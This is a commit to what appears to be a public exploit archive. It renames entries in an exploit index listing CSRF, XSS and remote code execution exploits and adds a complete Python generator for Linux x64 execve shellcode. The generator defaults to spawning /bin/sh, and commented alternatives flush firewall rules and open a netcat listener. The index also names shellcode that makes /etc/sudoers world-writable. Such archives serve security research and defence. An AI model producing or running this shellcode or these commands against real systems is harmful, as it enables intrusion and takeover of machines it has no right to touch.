DB: 2018-04-12

2 changes to exploits/shellcodes Cobub Razor 0.7.2 - Cross Site Request Forgery WolfCMS 0.8.3.1 - Cross Site Request Forgery Cobub Razor 0.7.2 - Cross-Site Request Forgery WolfCMS 0.8.3.1 - Cross-Site Request Forgery KYOCERA Net Admin 3.4 - Cross Site Request Forgery - Add Admin Exploit KYOCERA Net Admin 3.4 - Cross-Site Request Forgery (Add Admin) iScripts SonicBB 1.0 - Reflected Cross-Site Scripting iScripts SonicBB 1.0 - Reflected Cross-Site Scripting (PoC) Wordpress Plugin Activity Log 2.4.0 - Stored Cross Site Scripting WUZHI CMS 4.1.0 - ‘Add Admin Account’ Cross-Site Request Forgery WUZHI CMS 4.1.0 - ‘Add User Account’ Cross-Site Request Forgery Wordpress Plugin Activity Log 2.4.0 - Stored Cross-Site Scripting WUZHI CMS 4.1.0 - Cross-Site Request Forgery (Add Admin User) WUZHI CMS 4.1.0 - Cross-Site Request Forgery (Add User) WordPress File Upload Plugin 4.3.2 - Stored Cross Site Scripting WordPress Plugin WordPress File Upload 4.3.3 - Stored XSS WordPress Plugin File Upload 4.3.2 - Stored Cross-Site Scripting WordPress Plugin File Upload 4.3.3 - Stored Cross-Site Scripting (PoC) Linux/x64 - x64 Assembly Shellcode (Generator)
2018-04-12 05:01:47 +00:00 · 2018-04-12 05:01:47 +00:00 · 3339727aed
commit 3339727aed
parent 08c1a4df45
4 changed files with 107 additions and 10 deletions
--- a/exploits/php/webapps/44418.txt
+++ b/exploits/php/webapps/44418.txt
@ -8,7 +8,7 @@
 # Author Blog : http://nullnews.in
 # Vendor Homepage: http://www.wolfcms.org
 # Software Link:
-https://bitbucket.org/wolfcms/wolf-cms-downloads/downloads/wolfcms-0.8.3.1.zip
+
 # Affected Version: 0.8.3.1
 # Category: WebApps
 # Tested on: Win7 Enterprise x86/Kali Linux 4.12 i686
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -39120,8 +39120,8 @@ id,file,description,date,author,type,platform,port
 44408,exploits/php/webapps/44408.txt,"GetSimple CMS 3.3.13 - Cross-Site Scripting",2018-04-05,"Sureshbabu Narvaneni",webapps,php,
 44413,exploits/hardware/webapps/44413.txt,"FiberHome VDSL2 Modem HG 150-UB - Authentication Bypass",2018-04-06,"Noman Riffat",webapps,hardware,
 44414,exploits/windows/webapps/44414.txt,"DotNetNuke DNNarticle Module 11 - Directory Traversal",2018-04-06,"Esmaeil Rahimian",webapps,windows,
-44416,exploits/php/webapps/44416.txt,"Cobub Razor 0.7.2 - Cross Site Request Forgery",2018-04-06,ppb,webapps,php,
-44418,exploits/php/webapps/44418.txt,"WolfCMS 0.8.3.1 - Cross Site Request Forgery",2018-04-09,"Sureshbabu Narvaneni",webapps,php,
+44416,exploits/php/webapps/44416.txt,"Cobub Razor 0.7.2 - Cross-Site Request Forgery",2018-04-06,ppb,webapps,php,
+44418,exploits/php/webapps/44418.txt,"WolfCMS 0.8.3.1 - Cross-Site Request Forgery",2018-04-09,"Sureshbabu Narvaneni",webapps,php,
 44419,exploits/php/webapps/44419.txt,"Cobub Razor 0.7.2 - Add New Superuser Account",2018-04-09,ppb,webapps,php,
 44420,exploits/php/webapps/44420.txt,"MyBB Plugin Recent Threads On Index - Cross-Site Scripting",2018-04-09,Perileos,webapps,php,
 44421,exploits/php/webapps/44421.txt,"WolfCMS 0.8.3.1 - Open Redirection",2018-04-09,"Sureshbabu Narvaneni",webapps,php,80
@ -39129,15 +39129,15 @@ id,file,description,date,author,type,platform,port
 44425,exploits/php/webapps/44425.txt,"WordPress Plugin Simple Fields 0.2 - 0.3.5 - Local/Remote File Inclusion / Remote Code Execution",2018-04-09,"Graeme Robinson",webapps,php,80
 44429,exploits/json/webapps/44429.txt,"CyberArk Password Vault Web Access < 9.9.5 / < 9.10 / 10.1 - Remote Code Execution",2018-04-09,"RedTeam Pentesting",webapps,json,
 44430,exploits/linux/webapps/44430.txt,"KYOCERA Multi-Set Template Editor 3.4 - Out-Of-Band XML External Entity Injection",2018-04-09,LiquidWorm,webapps,linux,
-44431,exploits/linux/webapps/44431.txt,"KYOCERA Net Admin 3.4 - Cross Site Request Forgery - Add Admin Exploit",2018-04-09,LiquidWorm,webapps,linux,
+44431,exploits/linux/webapps/44431.txt,"KYOCERA Net Admin 3.4 - Cross-Site Request Forgery (Add Admin)",2018-04-09,LiquidWorm,webapps,linux,
 44432,exploits/php/webapps/44432.txt,"Buddypress Xprofile Custom Fields Type 2.6.3  - Remote Code Execution",2018-04-09,"Lenon Leite",webapps,php,
 44433,exploits/php/webapps/44433.txt,"WooCommerce CSV-Importer-Plugin 3.3.6 - Remote Code Execution",2018-04-09,"Lenon Leite",webapps,php,
-44434,exploits/php/webapps/44434.txt,"iScripts SonicBB 1.0 - Reflected Cross-Site Scripting",2018-04-09,ManhNho,webapps,php,
+44434,exploits/php/webapps/44434.txt,"iScripts SonicBB 1.0 - Reflected Cross-Site Scripting (PoC)",2018-04-09,ManhNho,webapps,php,
 44435,exploits/php/webapps/44435.txt,"WordPress Plugin Google Drive 2.2 - Remote Code Execution",2018-04-09,"Lenon Leite",webapps,php,
 44436,exploits/php/webapps/44436.txt,"iScripts Easycreate 3.2.1 - Stored Cross-Site Scripting",2018-04-10,ManhNho,webapps,php,
-44437,exploits/php/webapps/44437.txt,"Wordpress Plugin Activity Log 2.4.0 - Stored Cross Site Scripting",2018-04-10,"Stefan Broeder",webapps,php,
-44439,exploits/php/webapps/44439.txt,"WUZHI CMS 4.1.0 - ‘Add Admin Account’ Cross-Site Request Forgery",2018-04-10,taoge,webapps,php,
-44440,exploits/php/webapps/44440.txt,"WUZHI CMS 4.1.0 - ‘Add User Account’ Cross-Site Request Forgery",2018-04-10,taoge,webapps,php,
+44437,exploits/php/webapps/44437.txt,"Wordpress Plugin Activity Log 2.4.0 - Stored Cross-Site Scripting",2018-04-10,"Stefan Broeder",webapps,php,
+44439,exploits/php/webapps/44439.txt,"WUZHI CMS 4.1.0 - Cross-Site Request Forgery (Add Admin User)",2018-04-10,taoge,webapps,php,
+44440,exploits/php/webapps/44440.txt,"WUZHI CMS 4.1.0 - Cross-Site Request Forgery (Add User)",2018-04-10,taoge,webapps,php,
 44441,exploits/linux/webapps/44441.txt,"Dell EMC Avamar and Integrated Data Protection Appliance Installation Manager - Invalid Access Control",2018-04-10,SlidingWindow,webapps,linux,
-44443,exploits/php/webapps/44443.txt,"WordPress File Upload Plugin 4.3.2 - Stored Cross Site Scripting",2018-04-10,ManhNho,webapps,php,
-44444,exploits/php/webapps/44444.txt,"WordPress Plugin WordPress File Upload 4.3.3 - Stored XSS",2018-04-10,ManhNho,webapps,php,
+44443,exploits/php/webapps/44443.txt,"WordPress Plugin File Upload 4.3.2 - Stored Cross-Site Scripting",2018-04-10,ManhNho,webapps,php,
+44444,exploits/php/webapps/44444.txt,"WordPress Plugin File Upload 4.3.3 - Stored Cross-Site Scripting (PoC)",2018-04-10,ManhNho,webapps,php,
--- a/files_shellcodes.csv
+++ b/files_shellcodes.csv
@ -873,3 +873,4 @@ id,file,description,date,author,type,platform
 43463,shellcodes/linux_x86/43463.nasm,"Linux/x86 - chmod 777 /etc/sudoers Shellcode (36 bytes)",2018-01-04,"Hashim Jawad",shellcode,linux_x86
 44321,shellcodes/linux_x86/44321.c,"Linux/x86 - execve(/bin/sh) Shellcode (18 bytes)",2018-03-20,"Anurag Srivastava",shellcode,linux_x86
 44334,shellcodes/linux_x86/44334.c,"Linux/x86 - EggHunter + Null-Free Shellcode (11 Bytes)",2018-03-23,"Anurag Srivastava",shellcode,linux_x86
+44445,shellcodes/generator/44445.py,"Linux/x64 - x64 Assembly Shellcode (Generator)",2018-04-11,0x4ndr3,shellcode,generator
--- a/shellcodes/generator/44445.py
+++ b/shellcodes/generator/44445.py
@ -0,0 +1,96 @@
+#!/usr/bin/env python
+#
+# Features:
+#	- Linux shellcode x64 assembly code generation
+#	- stack based (smaller payload size)
+# 	- execve based
+#	- supports long commands (meaning bigger than an x64 register - 64 bits)
+#	- supports long parameters (meaning bigger than an x64 register - 64 bits)
+#	- one command only (execve will alter the current memory proc and when it exits there's no continuation)
+#	- supports command with up to 8 parameters
+#
+# Instructions
+#	- requires full path to the command
+#	- only one command is supported due to execve transforming the current process into a new one, loosing all previous context (any other instructions that would have been executed)
+#	- after having the x64 generated assembly code:
+#		- copy paste it into a file (in a Linux environment) - example.nasm
+#		- execute:
+#			nasm -felf64 example.nasm -o example.o && ld example.o -o example
+#
+# Author: Andre Lima @0x4ndr3
+#	https://pentesterslife.blog
+#
+########
+
+command = "/bin/sh"
+#command = "/sbin/iptables -F INPUT"
+#command = "/bin/nc -lvp 3000"
+#command = "/bin/echo 1 2 3 4 5 6 7 longparamparamparam"
+
+def tohex(val, nbits):
+	return hex((val + (1 << nbits)) % (1 << nbits))
+
+code = ""
+code += "global _start\n"
+code += "section .text\n"
+code += "\n"
+code += "_start:\n"
+code += "push 59\n"
+code += "pop rax\n"
+code += "cdq\n"
+code += "push rdx\n"
+
+params = command.split(' ')
+try:
+	params.remove('') # in case of multiple spaces in between params in the command - cleanup
+except: # it throws an exception if it doesn't finds one
+	pass
+
+if len(params[0]) % 8 != 0:
+	command = "/"*(8-len(params[0])%8) + params[0]
+
+iters = len(command)/8 - 1
+while iters >= 0:
+	block = command[iters*8:iters*8+8]
+	code += "mov rbx, 0x" + block[::-1].encode("hex") + "\n"
+	code += "push rbx\n"
+	iters -= 1
+
+code += "push rsp\n"
+code += "pop rdi\n"
+
+aux_regs = ["r8","r9","r10","r11","r12","r13","r14","r15"]
+i = 0
+params = params[1:] # remove first element - command itself. we just want the params
+if len(params) > len(aux_regs):
+	print "More than " + str(len(aux_regs)) + " parameters... Unsupported."
+	exit(1)
+for p in params:
+	code += "push rdx\n"
+	if len(p) % 8 != 0:
+		p += "\x00"*(8-len(p)%8)
+	iters = len(p)/8 -1
+	while iters >= 0: # each param
+		block = p[iters*8:iters*8+8]
+		code += "mov rbx, 0x" + tohex(~int(block[::-1].encode("hex"),16),64)[2:2+16] + "\n"
+		code += "not rbx\n"
+		code += "push rbx\n"
+		iters -= 1
+	code += "push rsp\n"
+	code += "pop " + aux_regs[i] + "\n"
+	i += 1
+
+code += "push rdx\n"
+code += "push rsp\n"
+code += "pop rdx\n"
+
+while i>0:
+	i -= 1
+	code += "push " + aux_regs[i] + "\n"
+
+code += "push rdi\n"
+code += "push rsp\n"
+code += "pop rsi\n"
+code += "syscall\n"
+
+print code